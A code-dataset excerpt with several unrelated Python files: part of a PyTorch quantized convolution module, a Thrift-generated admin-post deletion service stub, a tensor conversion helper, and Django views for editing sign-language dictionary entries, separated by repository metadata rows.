return (quant_input, quant_weight)
class QuantConv2d(_QuantConvNd):
"""Quantized 2D conv"""
default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_CONV2D_WEIGHT_PER_CHANNEL
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
dilation=1,
groups=1,
bias=True,
padding_mode='zeros',
**kwargs):
kernel_size = _pair(kernel_size)
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
quant_desc_input, quant_desc_weight = _utils.pop_quant_desc_in_kwargs(self.__class__, **kwargs)
super(QuantConv2d, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, False,
_pair(0), groups, bias, padding_mode,
quant_desc_input=quant_desc_input, quant_desc_weight=quant_desc_weight)
def forward(self, input):
# the actual quantization happens in the next level of the class hierarchy
quant_input, quant_weight = self._quant(input)
if self.padding_mode == 'circular':
expanded_padding = ((self.padding[1] + 1) // 2, self.padding[1] // 2,
(self.padding[0] + 1) // 2, self.padding[0] // 2)
output = F.conv2d(F.pad(quant_input, expanded_padding, mode='circular'),
quant_weight, self.bias, self.stride,
_pair(0), self.dilation, self.groups)
else:
output = F.conv2d(quant_input, quant_weight, self.bias, self.stride, self.padding, self.dilation,
self.groups)
return output
class QuantConv3d(_QuantConvNd):
"""Quantized 3D Conv"""
default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_CONV3D_WEIGHT_PER_CHANNEL
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
dilation=1,
groups=1,
bias=True,
padding_mode='zeros',
**kwargs):
kernel_size = _triple(kernel_size)
stride = _triple(stride)
padding = _triple(padding)
dilation = _triple(dilation)
quant_desc_input, quant_desc_weight = _utils.pop_quant_desc_in_kwargs(self.__class__, **kwargs)
super(QuantConv3d, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, False,
_triple(0), groups, bias, padding_mode,
quant_desc_input=quant_desc_input, quant_desc_weight=quant_desc_weight)
def forward(self, input):
# the actual quantization happens in the next level of the class hierarchy
quant_input, quant_weight = self._quant(input)
if self.padding_mode == 'circular':
expanded_padding = ((self.padding[2] + 1) // 2, self.padding[2] // 2,
(self.padding[1] + 1) // 2, self.padding[1] // 2,
(self.padding[0] + 1) // 2, self.padding[0] // 2)
output = F.conv3d(F.pad(quant_input, expanded_padding, mode='circular'),
quant_weight, self.bias, self.stride, _triple(0),
self.dilation, self.groups)
else:
output = F.conv3d(quant_input, quant_weight, self.bias, self.stride, self.padding, self.dilation,
self.groups)
return output
class QuantConv1d(_QuantConvNd):
"""Quantized 1D Conv"""
default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_CONV1D_WEIGHT_PER_CHANNEL
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
dilation=1,
groups=1,
bias=True,
padding_mode='zeros',
**kwargs):
kernel_size = _single(kernel_size)
stride = _single(stride)
padding = _single(padding)
dilation = _single(dilation)
quant_desc_input, quant_desc_weight = _utils.pop_quant_desc_in_kwargs(self.__class__, **kwargs)
super(QuantConv1d, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation, False,
_single(0), groups, bias, padding_mode,
quant_desc_input=quant_desc_input, quant_desc_weight=quant_desc_weight)
def forward(self, input):
# the actual quantization happens in the next level of the class hierarchy
quant_input, quant_weight = self._quant(input)
if self.padding_mode == 'circular':
expanded_padding = ((self.padding[0] + 1) // 2, self.padding[0] // 2)
output = F.conv1d(F.pad(quant_input, expanded_padding, mode='circular'),
quant_weight, self.bias, self.stride,
_single(0), self.dilation, self.groups)
else:
output = F.conv1d(quant_input, quant_weight, self.bias, self.stride,
self.padding, self.dilation, self.groups)
return output
class _QuantConvTransposeNd(torch.nn.modules.conv._ConvTransposeNd, _utils.QuantMixin):
"""base class of quantized Transposed Conv inherited from _ConvTransposeNd
Comments of original arguments can be found in torch.nn.modules.conv
Arguments:
quant_desc_input: An instance of :class:`QuantDescriptor <pytorch_quantization.tensor_quant.QuantDescriptor>`.
Quantization descriptor of input.
quant_desc_weight: An instance of :class:`QuantDescriptor <pytorch_quantization.tensor_quant.QuantDescriptor>`.
Quantization descriptor of weight.
Raises:
ValueError: If unsupported arguments are passed in.
Readonly properties:
- input_quantizer:
- weight_quantizer:
Static methods:
- set_default_quant_desc_input: Set default_quant_desc_input
- set_default_quant_desc_weight: Set default_quant_desc_weight
"""
default_quant_desc_input = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_PER_TENSOR
def __init__(self, in_channels, out_channels, kernel_size, stride,
padding, dilation, transposed, output_padding,
groups, bias, padding_mode, quant_desc_input, quant_desc_weight):
super(_QuantConvTransposeNd, self).__init__(in_channels, out_channels, kernel_size, stride, padding, dilation,
transposed, output_padding, groups, bias, padding_mode)
self.init_quantizer(quant_desc_input, quant_desc_weight)
def _quant(self, input):
"""Apply quantization on input and weight
        Helper called by the classes lower in the hierarchy; it performs the quantization of input and weight
        before the forward pass of the derived class runs.
Arguments:
input: in_features to quantize
Returns:
A tuple: (quant_in_feature, quant_weight)
"""
quant_input = self._input_quantizer(input)
quant_weight = self._weight_quantizer(self.weight)
return (quant_input, quant_weight)
class QuantConvTranspose1d(_QuantConvTransposeNd):
"""Quantized ConvTranspose1d"""
default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_CONVTRANSPOSE1D_WEIGHT_PER_CHANNEL
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
output_padding=0,
groups=1,
bias=True,
dilation=1,
padding_mode='zeros',
**kwargs):
kernel_size = _single(kernel_size)
stride = _single(stride)
padding = _single(padding)
dilation = _single(dilation)
output_padding = _single(output_padding)
quant_desc_input, quant_desc_weight = _utils.pop_quant_desc_in_kwargs(self.__class__, **kwargs)
super(QuantConvTranspose1d, self).__init__(
in_channels, out_channels, kernel_size, stride, padding, dilation,
True, output_padding, groups, bias, padding_mode,
quant_desc_input=quant_desc_input, quant_desc_weight=quant_desc_weight)
def forward(self, input, output_size=None):
if self.padding_mode != 'zeros':
raise ValueError('Only `zeros` padding mode is supported for QuantConvTranspose1d')
output_padding = self._output_padding(input, output_size, self.stride, self.padding, self.kernel_size)
quant_input, quant_weight = self._quant(input)
output = F.conv_transpose1d(quant_input, quant_weight, self.bias, self.stride, self.padding, output_padding,
self.groups, self.dilation)
return output
class QuantConvTranspose2d(_QuantConvTransposeNd):
"""Quantized ConvTranspose2d"""
default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_CONVTRANSPOSE2D_WEIGHT_PER_CHANNEL
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
output_padding=0,
groups=1,
bias=True,
dilation=1,
padding_mode='zeros',
**kwargs):
kernel_size = _pair(kernel_size)
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
output_padding = _pair(output_padding)
quant_desc_input, quant_desc_weight = _utils.pop_quant_desc_in_kwargs(self.__class__, **kwargs)
super(QuantConvTranspose2d, self).__init__(
in_channels, out_channels, kernel_size, stride, padding, dilation,
True, output_padding, groups, bias, padding_mode,
quant_desc_input=quant_desc_input, quant_desc_weight=quant_desc_weight)
def forward(self, input, output_size=None):
if self.padding_mode != 'zeros':
raise ValueError('Only `zeros` padding mode is supported for QuantConvTranspose2d')
output_padding = self._output_padding(input, output_size, self.stride, self.padding, self.kernel_size)
quant_input, quant_weight = self._quant(input)
output = F.conv_transpose2d(quant_input, quant_weight, self.bias, self.stride, self.padding, output_padding,
self.groups, self.dilation)
return output
class QuantConvTranspose3d(_QuantConvTransposeNd):
"""Quantized ConvTranspose3d"""
default_quant_desc_weight = tensor_quant.QUANT_DESC_8BIT_CONVTRANSPOSE3D_WEIGHT_PER_CHANNEL
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
output_padding=0,
groups=1,
bias=True,
dilation=1,
padding_mode='zeros',
**kwargs):
kernel_size = _triple(kernel_size)
stride = _triple(stride)
padding = _triple(padding)
dilation = _triple(dilation)
output_padding = _triple(output_padding)
quant_desc_input, quant_desc_weight = _utils.pop_quant_desc_in_kwargs(self.__class__, **kwargs)
super(QuantConvTranspose3d, self).__init__(
in_channels, out_channels, kernel_size, stride, padding, dilation,
True, output_padding, groups, bias, padding_mode,
quant_desc_input=quant_desc_input, quant_desc_weight=quant_desc_weight)
def forward(self, input, output_size=None):
if self.padding_mode != 'zeros':
raise ValueError('Only `zeros` padding mode is supported for QuantConvTranspose3d')
output_padding = self._output_padding(input, output_size, self.stride, self.padding, self.kernel_size)
quant_input, quant_weight = self._quant(input)
output = F.conv_transpose3d(quant_input, quant_weight, self.bias, self.stride, self.padding, output_padding,
self.groups, self.dilation)
return output
# Define alias with Quant prefix
_ConvNd = _QuantConvNd
Conv1d = QuantConv1d
Conv2d = QuantConv2d
Conv3d = QuantConv3d
ConvTranspose1d = QuantConvTranspose1d
ConvTranspose2d = QuantConvTranspose2d
ConvTranspose3d = QuantConvTranspose3d
| [
"[email protected]"
] | |
d6c42962c8c27b0253171b232edbef46fb681496 | b1182238bf0d26451d567e3100cea940be771ff1 | /hd-thrift-idl/hd-thrift-idl-social/src/main/python/SocialAdminService/ISocialAdminServiceDeleteAdminPost.py | 2ea38cd7fffadcfa9fbbd5dc18012fea42a09f4d | [] | no_license | ybg555/vue-tvBox | af6df0e07848efc1c2ac80ee8b7c16c65b790a40 | 57e3849e7f8272794e5a38d5e49bb68f7a44f286 | refs/heads/master | 2021-01-15T15:42:23.728423 | 2016-10-02T09:36:08 | 2016-10-02T09:36:08 | 55,936,790 | 1 | 0 | null | 2016-04-12T01:07:09 | 2016-04-11T02:52:05 | Python | UTF-8 | Python | false | true | 6,833 | py | #coding=utf-8
#
# Autogenerated by Thrift Compiler (0.9.2)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from ttypes import *
import TAdminPost.ttypes  # referenced below via TAdminPost.ttypes.TAdminPost
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
def deleteAdminPost(self, post):
"""
    Delete a post
@param post
@return
@author zhijian.li
Parameters:
- post
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def deleteAdminPost(self, post):
"""
    Delete a post
@param post
@return
@author zhijian.li
Parameters:
- post
"""
self.send_deleteAdminPost(post)
return self.recv_deleteAdminPost()
def send_deleteAdminPost(self, post):
self._oprot.writeMessageBegin('deleteAdminPost', TMessageType.CALL, self._seqid)
args = deleteAdminPost_args()
args.post = post
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_deleteAdminPost(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = deleteAdminPost_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "deleteAdminPost failed: unknown result");
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["deleteAdminPost"] = Processor.process_deleteAdminPost
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_deleteAdminPost(self, seqid, iprot, oprot):
args = deleteAdminPost_args()
args.read(iprot)
iprot.readMessageEnd()
result = deleteAdminPost_result()
result.success = self._handler.deleteAdminPost(args.post)
oprot.writeMessageBegin("deleteAdminPost", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class deleteAdminPost_args:
"""
Attributes:
- post
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'post', (TAdminPost.ttypes.TAdminPost, TAdminPost.ttypes.TAdminPost.thrift_spec), None, ), # 1
)
def __init__(self, post=None,):
self.post = post
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.post = TAdminPost.ttypes.TAdminPost()
self.post.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deleteAdminPost_args')
if self.post is not None:
oprot.writeFieldBegin('post', TType.STRUCT, 1)
self.post.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.post)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deleteAdminPost_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deleteAdminPost_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| [
"[email protected]"
] | |
4ea78129b575c0fa392a02973b2e72fc68d1979c | c37414be07a423968c897887b0844830e349741f | /fastestimator/backend/to_number.py | 766952ad187cb9f583dbacd315fbeb6d65a050c5 | [
"Apache-2.0"
] | permissive | vbvg2008/fastestimator-future | 5175047a1acac42f7172f8b9bb326486ed25a5a0 | dbf7d597d1f97140f837345f6b06f1773d4fa299 | refs/heads/master | 2022-03-30T22:48:59.349348 | 2020-01-06T08:35:04 | 2020-01-06T08:35:04 | 227,687,532 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 214 | py | import tensorflow as tf
import torch
def to_number(data):
if isinstance(data, tf.Tensor):
data = data.numpy()
elif isinstance(data, torch.Tensor):
data = data.data.numpy()
return data
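# A minimal usage sketch (assumed examples, not part of this module): tensors
# from either framework come back as numpy values, anything else passes through.
#   to_number(tf.constant([1.0, 2.0]))  # -> array([1., 2.], dtype=float32)
#   to_number(torch.tensor([3, 4]))     # -> array([3, 4])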
| [
"[email protected]"
] | |
d4b6091ec2ac16976849edd40296bf767472a246 | 4c14f3f73d4bf5d903a8108b22ab04523ec4d259 | /signbank/dictionary/update.py | d4ec23aafd3361c4da4b65e57af9c4f33c302ce3 | [
"BSD-3-Clause"
] | permissive | mbencherif/FinSL-signbank | acb8c8494a6fd644773abc06bea280dcea9be8d5 | a9b3dca3f01ac4672b81de7524af1371f603f604 | refs/heads/master | 2020-03-29T22:34:57.117754 | 2018-08-01T08:25:13 | 2018-08-01T08:25:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31,013 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import re
import csv
import codecs
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden, HttpResponseBadRequest, Http404, \
HttpResponseNotAllowed, HttpResponseServerError
from django.shortcuts import render, get_object_or_404, redirect, reverse
from django.contrib import messages
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.decorators import permission_required, login_required
from django.db.models.fields import NullBooleanField
from django.utils.translation import ugettext as _
from django.core.exceptions import ObjectDoesNotExist, PermissionDenied
from tagging.models import TaggedItem, Tag
from guardian.shortcuts import get_perms, get_objects_for_user
from .models import Gloss, Dataset, Translation, Keyword, Language, Dialect, GlossURL, \
GlossRelation, GlossTranslations, FieldChoice, MorphologyDefinition, RelationToForeignSign, Relation
from .models import build_choice_list
from .forms import TagsAddForm, TagUpdateForm, TagDeleteForm, GlossRelationForm, RelationForm, \
RelationToForeignSignForm, MorphologyForm, CSVUploadForm
from ..video.models import GlossVideo
@permission_required('dictionary.change_gloss')
def update_gloss(request, glossid):
"""View to update a gloss model from the jeditable jquery form
We are sent one field and value at a time, return the new value once we've updated it."""
# Get the gloss object or raise a Http404 exception if the object does not exist.
gloss = get_object_or_404(Gloss, id=glossid)
# Make sure that the user has rights to edit this datasets glosses.
if 'view_dataset' not in get_perms(request.user, gloss.dataset):
return HttpResponseForbidden(_("You do not have permissions to edit Glosses of this dataset/lexicon."))
if request.method == "POST":
# Update the user on Gloss.updated_by from request.user
gloss.updated_by = request.user
old_idgloss = str(gloss)
field = request.POST.get('id', '')
value = request.POST.get('value', '')
if len(value) == 0:
value = ' '
elif value[0] == '_':
value = value[1:]
# in case we need multiple values
values = request.POST.getlist('value[]')
if field.startswith('keywords_'):
language_code_2char = field.split('_')[1]
return update_keywords(gloss, field, value, language_code_2char=language_code_2char)
elif field.startswith('relationforeign'):
return update_relationtoforeignsign(gloss, field, value)
# Had to add field != 'relation_between_articulators' because I changed its field name, and it conflicted here.
elif field.startswith('relation') and field != 'relation_between_articulators':
return update_relation(gloss, field, value)
elif field.startswith('morphology-definition'):
return update_morphology_definition(gloss, field, value)
elif field == 'dialect':
# expecting possibly multiple values
try:
gloss.dialect.clear()
for value in values:
lang = Dialect.objects.get(name=value)
gloss.dialect.add(lang)
gloss.save()
newvalue = ", ".join([str(g.name)
for g in gloss.dialect.all()])
except:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest("%s %s" % _("Unknown Dialect"), values, content_type='text/plain')
elif field.startswith('video_title'):
# If editing video title, update the GlossVideo's title
if request.user.has_perm('video.change_glossvideo'):
# Get pk after string "video_title"
video_pk = field.split('video_title')[1]
newvalue = value
try:
video = GlossVideo.objects.get(pk=video_pk)
video.title = value
video.save()
except GlossVideo.DoesNotExist:
return HttpResponseBadRequest('{error} {values}'.format(error=_('GlossVideo does not exist'), values=values),
content_type='text/plain')
else:
return HttpResponseForbidden('Missing permission: video.change_glossvideo')
elif field.startswith('glossurl-'):
if field == 'glossurl-create':
GlossURL.objects.create(url=value, gloss_id=glossid)
return HttpResponseRedirect(reverse('dictionary:admin_gloss_view', kwargs={'pk': gloss.id}))
else:
if request.user.has_perm('dictionary.change_gloss'):
glossurl_pk = field.split('glossurl-')[1]
newvalue = value
try:
glossurl = GlossURL.objects.get(pk=glossurl_pk)
glossurl.url = value
glossurl.save()
except GlossURL.DoesNotExist:
pass
else:
# Find if field is not in Gloss classes fields.
if field not in [f.name for f in Gloss._meta.get_fields()]:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest(_("Unknown field"), content_type='text/plain')
# Translate the value if a boolean
if isinstance(Gloss._meta.get_field(field), NullBooleanField):
newvalue = value
value = (value == 'Yes')
if value != ' ' or value != '':
# See if the field is a ForeignKey
if gloss._meta.get_field(field).get_internal_type() == "ForeignKey":
gloss.__setattr__(field, FieldChoice.objects.get(machine_value=value))
else:
gloss.__setattr__(field, value)
gloss.save()
# If the value is not a Boolean, return the new value
if not isinstance(value, bool):
f = Gloss._meta.get_field(field)
# for choice fields we want to return the 'display' version of the value
# Try to use get_choices to get correct choice names for FieldChoices
# If it doesn't work, go to exception and get flatchoices
try:
# valdict = dict(f.get_choices(include_blank=False))
valdict = dict(build_choice_list(field))
except:
valdict = dict(f.flatchoices)
# Some fields take ints
# if valdict.keys() != [] and type(valdict.keys()[0]) == int:
try:
newvalue = valdict.get(int(value), value)
# else:
except:
# either it's not an int or there's no flatchoices
# so here we use get with a default of the value itself
newvalue = valdict.get(value, value)
# If field is idgloss and if the value has changed
# Then change the filename on system and in glossvideo.videofile
if field == 'idgloss' and newvalue != old_idgloss:
try:
GlossVideo.rename_glosses_videos(gloss)
except (OSError, IOError):
# Catch error, but don't do anything for now.
return HttpResponseServerError(_("Error: Unable to change videofiles names."))
return HttpResponse(newvalue, content_type='text/plain')
else:
return HttpResponseNotAllowed(['POST'])
def update_keywords(gloss, field, value, language_code_2char):
"""Update the keyword field for the selected language"""
# Try to get the language object based on the language_code.
try:
language = Language.objects.get(language_code_2char=language_code_2char)
except Language.DoesNotExist:
# If the language_code does not exist in any Language.language_code_2char, return 400 Bad Request.
return HttpResponseBadRequest(_('A Language does not exist with language_code: ') + language_code_2char,
content_type='text/plain')
except Language.MultipleObjectsReturned:
# If multiple Languages exist with the same language_code_2char
return HttpResponseBadRequest(_('Multiple Languages with the same language_code exist, cannot edit because it '
'is unclear which languages translations to edit.'),
content_type='text/plain')
(glosstranslations, created) = GlossTranslations.objects.get_or_create(gloss=gloss, language=language)
glosstranslations.translations = value
glosstranslations.save()
# Save updated_by and updated_at field for Gloss
gloss.save()
return HttpResponse(value, content_type='text/plain')
def update_relation(gloss, field, value):
"""Update one of the relations for this gloss"""
(what, relid) = field.split('_')
what = what.replace('-', '_')
try:
rel = Relation.objects.get(id=relid)
except Relation.DoesNotExist:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest("%s '%s'" % _("Bad Relation ID"), relid, content_type='text/plain')
if not rel.source == gloss:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest(_("Relation doesn't match gloss"), content_type='text/plain')
if what == 'relationdelete':
print(("DELETE: ", rel))
rel.delete()
return HttpResponseRedirect(reverse('dictionary:admin_gloss_view', kwargs={'pk': gloss.id}))
elif what == 'relationrole':
# rel.role = value
try:
rel.role = FieldChoice.objects.get(machine_value=value)
except FieldChoice.DoesNotExist:
rel.role = value
rel.save()
# newvalue = rel.get_role_display()
newvalue = rel.role
elif what == 'relationtarget':
target = gloss_from_identifier(value)
if target:
rel.target = target
rel.save()
newvalue = str(target)
else:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest("%s '%s'" % _("Badly formed gloss identifier"), value,
content_type='text/plain')
else:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest("%s '%s'" % _("Unknown form field"), field, content_type='text/plain')
return HttpResponse(newvalue, content_type='text/plain')
def update_relationtoforeignsign(gloss, field, value):
"""Update one of the relations for this gloss"""
(what, relid) = field.split('_')
what = what.replace('-', '_')
try:
rel = RelationToForeignSign.objects.get(id=relid)
except RelationToForeignSign.DoesNotExist:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest("%s '%s'" % _("Bad RelationToForeignSign ID"), relid,
content_type='text/plain')
if not rel.gloss == gloss:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest(_("Relation doesn't match gloss"), content_type='text/plain')
if what == 'relationforeigndelete':
print(("DELETE: ", rel))
rel.delete()
return HttpResponseRedirect(reverse('dictionary:admin_gloss_view', kwargs={'pk': gloss.id}))
elif what == 'relationforeign_loan':
rel.loan = value == 'Yes'
rel.save()
elif what == 'relationforeign_other_lang':
rel.other_lang = value
rel.save()
elif what == 'relationforeign_other_lang_gloss':
rel.other_lang_gloss = value
rel.save()
else:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest("%s '%s'" % _("Unknown form field"), field, content_type='text/plain')
return HttpResponse(value, content_type='text/plain')
def gloss_from_identifier(value):
"""Given an id of the form idgloss (pk) return the
relevant gloss or None if none is found"""
# We need another way to add a Relation to a Gloss. One textfield can't serve all the possible ways of adding.
# One possible solution is to add two fields, one that serves adding by ID and other with Gloss name or name+id.
# However, no one is going to memorize or check for the id numbers and they will probably add with Gloss name only.
# Therefore the only useful implementation is to do it with the Gloss name only or with Glossname + id.
# TODO: Decide what to do here
"""
# See if 'value' is an int, should match if the user uses only an 'id' as a search string
try:
int(value)
is_int = True
except:
is_int = False
# If value is already int, try to match the int as IDGloss id.
if is_int:
try:
target = Gloss.objects.get(pk=int(value))
except ObjectDoesNotExist:
# If the int doesn't match anything, return
return HttpResponseBadRequest(_("Target gloss not found."), content_type='text/plain')
return target
# If 'value' is not int, then try to catch a string like "CAMEL (10)"
else:"""
# This regex looks from the Beginning of a string for IDGLOSS and then the id
# For example: "CAMEL (10)", idgloss="CAMEL" and pk=10
match = re.match(r'(.*) \((\d+)\)', value)
if match:
# print "MATCH: ", match
idgloss = match.group(1)
pk = match.group(2)
# print "INFO: ", idgloss, pk
# Try if target Gloss exists, if not, assign None to target, then it returns None
try:
target = Gloss.objects.get(pk=int(pk))
except ObjectDoesNotExist:
target = None
# print "TARGET: ", target
return target
# If regex doesn't match, return None
else:
return None
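# Worked example of the identifier format parsed above (a sketch; the gloss
# name and pk are hypothetical):
#   m = re.match(r'(.*) \((\d+)\)', 'CAMEL (10)')
#   m.group(1)  # -> 'CAMEL'
#   m.group(2)  # -> '10'
# Plain names without a trailing "(pk)" do not match the regex and fall
# through to the final `return None`.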
def add_relation(request):
"""Add a new relation instance"""
if request.method == "POST":
form = RelationForm(request.POST)
if form.is_valid():
role = form.cleaned_data['role']
sourceid = form.cleaned_data['sourceid']
targetid = form.cleaned_data['targetid']
try:
source = Gloss.objects.get(pk=int(sourceid))
except Gloss.DoesNotExist:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest(_("Source gloss not found."), content_type='text/plain')
target = gloss_from_identifier(targetid)
if target:
rel = Relation(source=source, target=target, role=role)
rel.save()
return HttpResponseRedirect(
reverse('dictionary:admin_gloss_view', kwargs={'pk': source.id}) + '?editrel')
else:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest(_("Target gloss not found."), content_type='text/plain')
else:
print(form)
# fallback to redirecting to the requesting page
return HttpResponseRedirect('/')
def add_relationtoforeignsign(request):
"""Add a new relationtoforeignsign instance"""
if request.method == "POST":
form = RelationToForeignSignForm(request.POST)
if form.is_valid():
sourceid = form.cleaned_data['sourceid']
loan = form.cleaned_data['loan']
other_lang = form.cleaned_data['other_lang']
other_lang_gloss = form.cleaned_data['other_lang_gloss']
try:
gloss = Gloss.objects.get(pk=int(sourceid))
except Gloss.DoesNotExist:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest(_("Source gloss not found."), content_type='text/plain')
rel = RelationToForeignSign(gloss=gloss, loan=loan, other_lang=other_lang,
other_lang_gloss=other_lang_gloss)
rel.save()
return HttpResponseRedirect(
reverse('dictionary:admin_gloss_view', kwargs={'pk': gloss.id}) + '?editrelforeign')
else:
print(form)
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest(_("Form not valid"), content_type='text/plain')
# fallback to redirecting to the requesting page
return HttpResponseRedirect('/')
def add_morphology_definition(request):
if request.method == "POST":
form = MorphologyForm(request.POST)
if form.is_valid():
parent_gloss = form.cleaned_data['parent_gloss_id']
role = form.cleaned_data['role']
morpheme_id = form.cleaned_data['morpheme_id']
morpheme = gloss_from_identifier(morpheme_id)
thisgloss = get_object_or_404(Gloss, pk=parent_gloss)
# create definition, default to not published
morphdef = MorphologyDefinition(
parent_gloss=thisgloss, role=role, morpheme=morpheme)
morphdef.save()
return HttpResponseRedirect(
reverse('dictionary:admin_gloss_view', kwargs={'pk': thisgloss.id}) + '?editmorphdef')
# Translators: Htt404
raise Http404(_('Incorrect request'))
def update_morphology_definition(gloss, field, value):
"""Update one of the relations for this gloss"""
(what, morph_def_id) = field.split('_')
what = what.replace('-', '_')
try:
morph_def = MorphologyDefinition.objects.get(id=morph_def_id)
except MorphologyDefinition.DoesNotExist:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest("%s '%s'" % _("Bad Morphology Definition ID"), morph_def_id,
content_type='text/plain')
if not morph_def.parent_gloss == gloss:
# Translators: HttpResponseBadRequest
return HttpResponseBadRequest(_("Morphology Definition doesn't match gloss"), content_type='text/plain')
if what == 'morphology_definition_delete':
print(("DELETE: ", morph_def))
morph_def.delete()
return HttpResponseRedirect(reverse('dictionary:admin_gloss_view', kwargs={'pk': gloss.id}))
elif what == 'morphology_definition_role':
# morph_def.role = value
morph_def.role = FieldChoice.objects.get(machine_value=value)
morph_def.save()
# newvalue = morph_def.get_role_display()
